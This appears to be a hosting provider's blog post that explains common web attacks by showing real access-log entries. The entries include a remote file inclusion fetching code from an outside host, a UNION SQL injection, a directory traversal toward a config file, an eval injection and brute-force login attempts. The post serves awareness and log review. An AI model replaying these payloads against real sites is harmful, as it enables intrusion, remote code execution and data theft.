That’s right, everyone is a potential target — not just the big names, not just the rich companies, etc.
Now, web-based hack attempts come in many forms ranging from brute force to SQL injections.
Here’s a list of the common types including links to their definitions:
- Brute Force Attack
- Cross Site Scripting Attack
- Directory Traversal Attack
- Local file inclusion
- Remote file inclusion
- SQL Injection attack
I would like to share with you what each of the above types looks like from a log file or security report perspective.
The following comes from our proactive security monitoring service as well the reports we receive from our global security service.
I’m going to start off with the most common type we see which is remote file inclusion:
126.96.36.199 - - [06/Sep/2012:01:13:27 -0400] "GET /packages//wp-content/themes/metamorphosis/functions/thumb.php?src=http://www.blogger.com.moulinsaeau-41.org/cache.php HTTP/1.1" 404 3612 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
The above is timthumb attack where the attacker believes the Metamorphosis theme for WordPress if vulnerable; and they are trying to include the code from http://www.blogger.com.moulinsaeau-41.org/cache.php through the potential vulnerability.
The next type is an SQL injection attack:
188.8.131.52 - - [09/Sep/2012:01:16:03 +0100] "GET /merchandise.php?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x6A6F686E73746F6E5F6965%20limit%200,1),2,3,4,5-- HTTP/1.1" 500 3506 "-" "-" UEvfw1Qz7pgAAGfUdE0 "-"
The next is a directory traversal attack:
184.108.40.206 - - [05/Sep/2012:21:28:20 +0100] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 500 3506 "-" "-" UEe15FQz7pAAABD2KuM "-"
What follows is an example of a local file inclusion:
220.127.116.11 - - [05/Sep/2012:18:13:46 +0100] "GET /phpMyAdmin//config/config.inc.php?eval=echo%20md5(123); HTTP/1.1" 500 3506 "-" "-" UEeISlWFNc8AABl2Nvw "-"
Below are two examples of brute force — one for SSH, the other for email:
sshd: Invalid user deploy from 18.104.22.168 vpopmail: vchkpw-pop3: vpopmail user not found webmaster@:22.214.171.124
Do you review your hosting log files on a regular basis to see what attacks are getting through or being blocked?
Is your provider doing this for you?
Please let us know your questions and thoughts in the comments below.